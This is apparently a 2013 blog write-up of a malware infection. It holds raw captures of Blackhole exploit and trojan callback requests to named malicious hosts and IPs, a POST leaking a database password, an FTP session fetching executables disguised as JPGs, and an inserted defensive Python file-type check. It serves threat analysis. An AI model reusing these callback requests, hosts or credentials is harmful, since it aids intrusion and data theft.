Sunday, April 21, 2013

FTP JPG EXE as a Second Stage

Something somewhat interesting. Blackhole exploit at


GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


SHA256: 5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257
File name: blackhole.exe
Detection ratio: 1 / 46
Analysis date: 2013-04-21 21:37:27 UTC
https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/

Ok, nothing new here. Whatever. Thanks for exploiting my Java. The strings output is all garbage, and PEiD balked.

1,400+ UDP hits on port 16471, à la ZeroAccess, in about 20 minutes, and an interesting one on 55755.


GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close

Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?

__________________________________________

POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache

IP Seen on URL Query: http://urlquery.net/report.php?id=1768644

__________________________________________

POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

The user agent is a big indicator here. Somewhat interesting; documented by #MalwareMustDie at http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html

Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid URL following this.
__________________________________________

This one looks interesting. Using Bit.ly, but a 301 to Google put the kibosh on this one.

POST /YddCcn? HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly
Connection: Keep-Alive

op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=turckatty_2&DatabaseBD=turckatty_2&sgdb=

Well, the user agent is known badness: here and here, dating back to 2010.


GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close

I surmise this is a check-in because I get a 200 OK but the content is empty; just speculation. Site sinkholed.


Ok, now for some FTP. The malware calls out to an FTP server with the user name and password in cleartext (most appreciated).

220 Microsoft FTP Service
USER <redacted>
331 Password required for <redacted>.
PASS <redacted>
230 User logged in.
215 Windows_NT
CWD /dados/maxo4/
250 CWD command successful.
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg
550 The system cannot find the file specified.

This thing tried multiple jpg files, none of which could be found. Well, I'm not going to let that one go by. Piqued my interest. I go digging and I find a root directory.

Interesting, so I download the jpgs that are there.

The worm is a variant of DelfInject.

MZP   ÿÿ¸@  º   ´ Í!¸ LÍ!This program must be run under Win32 $
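The header above is the trick in the title: a file served as .jpg whose first bytes are a DOS/PE header, with the "MZP" stub Delphi's linker emits. As an added example (not the author's code), here is a Python check a defender can run over downloaded payloads; it walks the MZ signature, e_lfanew and the PE\0\0 signature and flags an extension/content mismatch. The sample bytes are constructed, not taken from the capture.

```python
import struct

# Constructed sample: a minimal Delphi-style PE with the same stub text the
# post shows ("This program must be run under Win32"), not a real binary.
def build_fake_delphi_pe() -> bytes:
    hdr = bytearray(b"MZP" + b"\x00" * 0x3D)          # 0x40-byte DOS header
    e_lfanew = 0x80                                    # offset of "PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)        # e_lfanew lives at 0x3C
    body = bytes(hdr) + b"This program must be run under Win32\r\n$"
    body += b"\x00" * (e_lfanew - len(body))           # pad up to the PE header
    body += b"PE\x00\x00" + struct.pack("<H", 0x14C)   # signature + Machine=i386
    return body

# Constructed sample: a real JPEG magic (SOI marker + JFIF APP0 header).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

def classify_payload(data: bytes) -> str:
    """Classify by content only: 'jpeg', 'pe', 'delphi-pe' or 'unknown'."""
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if len(data) >= 0x40 and data[:2] == b"MZ":
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        # Bounds check first: a truncated download must not raise or be trusted.
        if e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            # "MZP" at offset 0 is the DOS stub Delphi writes; plain "MZ" is any PE.
            return "delphi-pe" if data[2:3] == b"P" else "pe"
    return "unknown"

def check_ftp_transfer(filename: str, data: bytes) -> dict:
    """Flag a RETR whose name says image but whose bytes say executable."""
    kind = classify_payload(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    mismatch = ext in {"jpg", "jpeg", "gif", "png"} and kind in {"pe", "delphi-pe"}
    return {"file": filename, "kind": kind, "suspicious": mismatch}

if __name__ == "__main__":
    print(check_ftp_transfer("E174D3044694.jpg", build_fake_delphi_pe()))
    print(check_ftp_transfer("E174D3044694.jpg", JPEG_SAMPLE))
```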


Dumping the strings:

DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
winspool.drv
OpenPrinterW
ntdll
NtUnmapViewOfSection

Interesting DNS traffic to a Sprint Wireless address; no further traffic on this one. Pwned mobile? (Guessing.)

00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]

173.4.250.10
88.191.130.98:8080
jindalo.ru:8080
111.68.142.223


Additional References:
http://labs.snort.org/iplists/urllist-2012-07-01
http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI
